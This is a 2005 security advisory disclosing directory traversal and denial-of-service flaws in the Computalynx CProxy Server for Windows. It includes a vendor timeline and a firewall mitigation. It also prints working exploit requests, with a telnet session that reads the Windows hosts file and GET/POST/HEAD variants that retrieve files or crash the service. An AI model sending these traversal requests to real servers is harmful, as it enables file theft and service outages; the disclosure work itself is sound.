Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities
+=========================================================================================+
| Security Advisory: Computalynx CProxy Server Multiple Remote
Vulnerabilities |
+=========================================================================================+
|
kristof.philipsen@xxxxxxxxxx
March 02, 2005 |
+=========================================================================================+
AFFECTED PRODUCTS
Affected Software:
- Computalynx CProxy 3.3.x for Win32
- Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32
Possibly other software versions are affected.
IDENTIFIED ISSUES
The following issues were found to affect the aforementioned Computalynx
CProxy Server software:
[1] Directory Traversal and Arbitrary File Access Attack
[2] Denial-of-Service Attack
BRIEF DESCRIPTION
Computalynx CProxy is a Windows platform based proxy server featuring
HTTP, Telnet, POP3, SMTP,
FTP proxy functions, as well as Anti Virus and Content Filtering
capabilities. Because of
inadequate input validation, a malicious attacker can perform a
directory traversal attack and
thus gain access to arbitrary files located on the CProxy Server
system. Moreover, using the
same attack vector with especially crafted HTTP requests, it is
possible to crash the CProxy
service running on the remote system.
DETAILED DESCRIPTION
Computalynx CProxy Server is a multifunctional Windows platform based
proxy server with multi-
protocol support. When performing proxy functions, CProxy Server is
vulnerable to a directory
traversal attack. Inadequate input validation and input filtering
allows a remote attacker to
gain attack to arbitrary files on the Windows system upon which the
CProxy Server software has
been deployed. This first issue of directory traversal lies within
the fact that the CProxy
Server fails to filter out double dot attacks and in turn fails to
protect arbitrary files
from being requested and opened using the proxy service. An
especially crafted URL allows
allows arbitrary files to be recovered from the system. The
retrieval of system files can
compromise the entire system or expose the system to further avenues of
attack. A malicious
attacker can perform a request using the following format to gain access
to arbitrary data:
GET http://<path-to-target-directory>/<filename> HTTP/1.0<CRLF><CRLF>
An attacker can gain access to a file in the WINNT directory as shown in
the following example,
by connecting to CProxy Server's proxy service (listening on TCP port
8080 by default), and
executing the following request:
ronin[kris] ~ $ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
HTTP/1.0 200 OK
Content-length: 734
Date: Sat, 19 Feb 2005 21:09:58 GMT
Date: Sat, 19 Feb 2005 21:09:58 GMT
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
Connection closed by foreign host.
In conjunction with this method, other HTTP methods such as "POST" and
"HEAD", will also lead to
arbitrary file retrieval.
When retrieving an arbitrary ASCII file using the "GET" method, causes
the file to be displayed
and immediately afterwards causes the CProxy Server service to crash
with an error message
indicating that "memory could not be read". However, when retrieving
this same ASCII file using
the "POST" or "HEAD" methods will cause the file contents to be
displayed and does not crash the
CProxy Server service, allowing an attacker to execute multiple
requests and thus allowing
various arbitrary files to be retrieved from the CProxy Server system.
* The following request will cause the arbitrary file to be displayed:
-> "POST http://../../../../../winnt/system32/drivers/etc/hosts
HTTP/1.0"
* The following request will cause the arbitrary file to be displayed
and the CProxy Server
service to crash:
-> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
When attempting to retrieve an executable file using any of these HTTP
methods ("GET","HEAD", or
"POST"), in the aforementioned manner, will cause the contents of the
executable file contents
to be displayed and the CProxy Server service to crash with an error
message that "memory could
not be read", rendering the service unavailable, thus resulting in a
Denial-of-Service condition.
* Both of the following requests will cause the arbitrary executable's
contents to be displayed
and the CProxy Server service to crash:
-> "GET http://../../../../../winnt/system32/cmd.exe"
-> "POST http://../../../../../winnt/system32/cmd.exe"
CHARACTERISTICS
* Inadequate input validation and filtering allows an attacker to
perform directory traversal
attacks against the systems running Computalynx CProxy Server.
* Different vectors of attack allow retrieval of arbitrary and possibly
sensitive files from
the system running Computalynx CProxy Server.
* Use of especially crafted URL's allow attackers to render to service
unavailable, causing a
Denial-of-Service condition.
SEVERITY
Each of these two issues affecting Computalynx CProxy Server software
can directly or indirectly
allow partial or complete compromise of the system and/or the data
stored on the system running
the CProxy Server software.
Moreover, the second issue regarding a Denial-of-Service attack
against the CProxy Server
software will directly affect any users depending on the availability of
the functions which the
CProxy Software performs on this system.
Classification: MEDIUM to HIGH
VENDOR STATUS
19/Feb/2005 - Computalynx contacted regarding this issue.
02/Mar/2005 - At present, the vendor has not replied regarding this issue.
SOLUTION
* Currently awaiting vendor status for a solution regarding this issue.
* A mitigation strategy against attacks of this nature would be to
ensure that remote connections
to the CProxy Server are not authorised (i.e. through the use of
proper firewall rules).
REFERENCES
[1] "Computalynx Software"
- http://www.computalynx.com
--
Kristof Philipsen
Security Engineer
Ubizen - a Cybertrust company
18 rue Robert Stumper
L-2557 Luxembourg
Luxembourg
T: +352 26 31 05 85
F: +352 26 31 05 86
E-mail: kristof.philipsen@xxxxxxxxxx
www.ubizen.com - www.cybertrust.com